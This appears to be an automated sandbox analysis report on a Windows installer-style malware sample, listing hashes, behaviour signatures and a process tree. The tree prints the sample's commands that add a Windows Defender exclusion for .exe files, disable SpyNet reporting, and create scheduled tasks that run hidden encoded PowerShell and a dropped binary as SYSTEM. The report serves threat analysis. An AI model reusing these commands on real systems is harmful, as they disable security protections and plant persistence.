Analysis
-
max time kernel
126s -
max time network
159s -
platform
windows10-2004_x64 -
resource
win10v2004-20231020-en -
resource tags
arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system -
submitted
11-11-2023 15:01
Static task
static1
General
-
Target
cd33be75a1a4438832cf87d7bd7f184bdca1fbaa0c0a2c59eaaa35df93e74558.exe
-
Size
7.2MB
-
MD5
02e3e8c3ae7932f4ef685f1bcc631a86
-
SHA1
dbd7dabf286456863637628d120748a341eabf52
-
SHA256
cd33be75a1a4438832cf87d7bd7f184bdca1fbaa0c0a2c59eaaa35df93e74558
-
SHA512
6fac09452d78db296730855bd3f8a0ceb28a99a06fb9c305ec6379d9af383bc3f5e540c2c101c791a9def01a00e63271680cc91089ec6f44b5483d671442f327
-
SSDEEP
196608:91OG96wbsqdRXCosfoGDSgbQUfZFRGrogm0jpRZxFyGq1GS3b6Dx:3OrwLdRyoooGDSgbQocQ0jpLxVny+
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 96 548 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation iqSTDyt.exe -
Executes dropped EXE 4 IoCs
pid Process 1472 Install.exe 1028 Install.exe 3692 bwvabdN.exe 4156 iqSTDyt.exe -
Loads dropped DLL 1 IoCs
pid Process 548 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json iqSTDyt.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini iqSTDyt.exe -
Drops file in System32 directory 29 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache iqSTDyt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 iqSTDyt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content iqSTDyt.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini bwvabdN.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 iqSTDyt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_5A8DA7E75009D0EA2C79217981FF930C iqSTDyt.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol bwvabdN.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData iqSTDyt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 iqSTDyt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA iqSTDyt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_11314361DFE3E655E02EC2E7F9346EC1 iqSTDyt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA iqSTDyt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA iqSTDyt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE iqSTDyt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8C0A4A9E1CEFEB34D84E7975A8A5D28F iqSTDyt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_17A1BB9C6401DC9652040571BD192211 iqSTDyt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_11314361DFE3E655E02EC2E7F9346EC1 iqSTDyt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 iqSTDyt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft iqSTDyt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_5A8DA7E75009D0EA2C79217981FF930C iqSTDyt.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies iqSTDyt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8C0A4A9E1CEFEB34D84E7975A8A5D28F iqSTDyt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_17A1BB9C6401DC9652040571BD192211 iqSTDyt.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA iqSTDyt.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol iqSTDyt.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi iqSTDyt.exe File created C:\Program Files (x86)\BjJZYiuqlPgU2\SSFxugC.xml iqSTDyt.exe File created C:\Program Files (x86)\kpvgWGyvU\TIbnXj.dll iqSTDyt.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak iqSTDyt.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak iqSTDyt.exe File created C:\Program Files (x86)\kpvgWGyvU\GrRvScR.xml iqSTDyt.exe File created C:\Program Files (x86)\FcokcjqiGXWmUJvFooR\NZYoloJ.dll iqSTDyt.exe File created C:\Program Files (x86)\FcokcjqiGXWmUJvFooR\AjdCZrS.xml iqSTDyt.exe File created C:\Program Files (x86)\wStPwHPBGQsuC\DPUYNBZ.xml iqSTDyt.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi iqSTDyt.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja iqSTDyt.exe File created C:\Program Files (x86)\wStPwHPBGQsuC\NFJYXqB.dll iqSTDyt.exe File created C:\Program Files (x86)\DIGofpDPDqUn\WqbcOja.dll iqSTDyt.exe File created C:\Program Files (x86)\BjJZYiuqlPgU2\ZTwIbbFnwXEjm.dll iqSTDyt.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bqEFPgBHoYySYAkccD.job schtasks.exe File created C:\Windows\Tasks\bdrESRlZGEayfzFZZ.job schtasks.exe File created C:\Windows\Tasks\unWYiNUJqAlITwd.job schtasks.exe File created C:\Windows\Tasks\jRVNJXEqUfFueAuNO.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1540 schtasks.exe 4080 schtasks.exe 1392 schtasks.exe 208 schtasks.exe 2352 schtasks.exe 1792 schtasks.exe 4340 schtasks.exe 696 schtasks.exe 2488 schtasks.exe 1884 schtasks.exe 368 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix iqSTDyt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket iqSTDyt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" iqSTDyt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" iqSTDyt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer iqSTDyt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" iqSTDyt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume iqSTDyt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ iqSTDyt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" iqSTDyt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3800 powershell.EXE 3800 powershell.EXE 3800 powershell.EXE 1732 powershell.exe 1732 powershell.exe 4704 powershell.exe 4704 powershell.exe 3760 powershell.EXE 3760 powershell.EXE 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe 4156 iqSTDyt.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3800 powershell.EXE Token: SeDebugPrivilege 1732 powershell.exe Token: SeDebugPrivilege 4704 powershell.exe Token: SeDebugPrivilege 3760 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 564 wrote to memory of 1472 564 cd33be75a1a4438832cf87d7bd7f184bdca1fbaa0c0a2c59eaaa35df93e74558.exe 86 PID 564 wrote to memory of 1472 564 cd33be75a1a4438832cf87d7bd7f184bdca1fbaa0c0a2c59eaaa35df93e74558.exe 86 PID 564 wrote to memory of 1472 564 cd33be75a1a4438832cf87d7bd7f184bdca1fbaa0c0a2c59eaaa35df93e74558.exe 86 PID 1472 wrote to memory of 1028 1472 Install.exe 89 PID 1472 wrote to memory of 1028 1472 Install.exe 89 PID 1472 wrote to memory of 1028 1472 Install.exe 89 PID 1028 wrote to memory of 2168 1028 Install.exe 91 PID 1028 wrote to memory of 2168 1028 Install.exe 91 PID 1028 wrote to memory of 2168 1028 Install.exe 91 PID 1028 wrote to memory of 2916 1028 Install.exe 93 PID 1028 wrote to memory of 2916 1028 Install.exe 93 PID 1028 wrote to memory of 2916 1028 Install.exe 93 PID 2168 wrote to memory of 4268 2168 forfiles.exe 96 PID 2168 wrote to memory of 4268 2168 forfiles.exe 96 PID 2168 wrote to memory of 4268 2168 forfiles.exe 96 PID 2916 wrote to memory of 4672 2916 forfiles.exe 95 PID 2916 wrote to memory of 4672 2916 forfiles.exe 95 PID 2916 wrote to memory of 4672 2916 forfiles.exe 95 PID 4268 wrote to memory of 2668 4268 cmd.exe 98 PID 4268 wrote to memory of 2668 4268 cmd.exe 98 PID 4268 wrote to memory of 2668 4268 cmd.exe 98 PID 4672 wrote to memory of 2608 4672 cmd.exe 97 PID 4672 wrote to memory of 2608 4672 cmd.exe 97 PID 4672 wrote to memory of 2608 4672 cmd.exe 97 PID 4268 wrote to memory of 4940 4268 cmd.exe 99 PID 4268 wrote to memory of 4940 4268 cmd.exe 99 PID 4268 wrote to memory of 4940 4268 cmd.exe 99 PID 4672 wrote to memory of 652 4672 cmd.exe 100 PID 4672 wrote to memory of 652 4672 cmd.exe 100 PID 4672 wrote to memory of 652 4672 cmd.exe 100 PID 1028 wrote to memory of 1792 1028 Install.exe 104 PID 1028 wrote to memory of 1792 1028 Install.exe 104 PID 1028 wrote to memory of 1792 1028 Install.exe 104 PID 1028 wrote to memory of 1624 1028 Install.exe 106 PID 1028 wrote to memory of 1624 1028 Install.exe 106 PID 1028 wrote to memory of 1624 1028 Install.exe 106 PID 3800 wrote to memory of 2876 3800 powershell.EXE 110 PID 3800 wrote to memory of 2876 3800 powershell.EXE 110 PID 1028 wrote to memory of 2440 1028 Install.exe 118 PID 1028 wrote to memory of 2440 1028 Install.exe 118 PID 1028 wrote to memory of 2440 1028 Install.exe 118 PID 1028 wrote to memory of 4340 1028 Install.exe 120 PID 1028 wrote to memory of 4340 1028 Install.exe 120 PID 1028 wrote to memory of 4340 1028 Install.exe 120 PID 3692 wrote to memory of 1732 3692 bwvabdN.exe 124 PID 3692 wrote to memory of 1732 3692 bwvabdN.exe 124 PID 3692 wrote to memory of 1732 3692 bwvabdN.exe 124 PID 1732 wrote to memory of 524 1732 powershell.exe 126 PID 1732 wrote to memory of 524 1732 powershell.exe 126 PID 1732 wrote to memory of 524 1732 powershell.exe 126 PID 524 wrote to memory of 3028 524 cmd.exe 127 PID 524 wrote to memory of 3028 524 cmd.exe 127 PID 524 wrote to memory of 3028 524 cmd.exe 127 PID 1732 wrote to memory of 1412 1732 powershell.exe 128 PID 1732 wrote to memory of 1412 1732 powershell.exe 128 PID 1732 wrote to memory of 1412 1732 powershell.exe 128 PID 1732 wrote to memory of 3960 1732 powershell.exe 129 PID 1732 wrote to memory of 3960 1732 powershell.exe 129 PID 1732 wrote to memory of 3960 1732 powershell.exe 129 PID 1732 wrote to memory of 2456 1732 powershell.exe 130 PID 1732 wrote to memory of 2456 1732 powershell.exe 130 PID 1732 wrote to memory of 2456 1732 powershell.exe 130 PID 1732 wrote to memory of 3484 1732 powershell.exe 131 PID 1732 wrote to memory of 3484 1732 powershell.exe 131
Processes
-
C:\Users\Admin\AppData\Local\Temp\cd33be75a1a4438832cf87d7bd7f184bdca1fbaa0c0a2c59eaaa35df93e74558.exe"C:\Users\Admin\AppData\Local\Temp\cd33be75a1a4438832cf87d7bd7f184bdca1fbaa0c0a2c59eaaa35df93e74558.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:564 -
C:\Users\Admin\AppData\Local\Temp\7zS7DB.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1472 -
C:\Users\Admin\AppData\Local\Temp\7zSB36.tmp\Install.exe.\Install.exe /brdidmSL "385121" /S3⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1028 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2168 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4268 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:2668
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:4940
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2916 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4672 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:2608
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:652
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gxtHveWhY" /SC once /ST 14:21:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1792
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gxtHveWhY"4⤵PID:1624
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gxtHveWhY"4⤵PID:2440
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bqEFPgBHoYySYAkccD" /SC once /ST 15:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\VVPOgfufcruankpaJ\AIrFuDqJGbmFMTI\bwvabdN.exe\" ov /Qpsite_idwQJ 385121 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4340
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3800 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2876
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4708
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1684
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3896
-
C:\Users\Admin\AppData\Local\Temp\VVPOgfufcruankpaJ\AIrFuDqJGbmFMTI\bwvabdN.exeC:\Users\Admin\AppData\Local\Temp\VVPOgfufcruankpaJ\AIrFuDqJGbmFMTI\bwvabdN.exe ov /Qpsite_idwQJ 385121 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3692 -
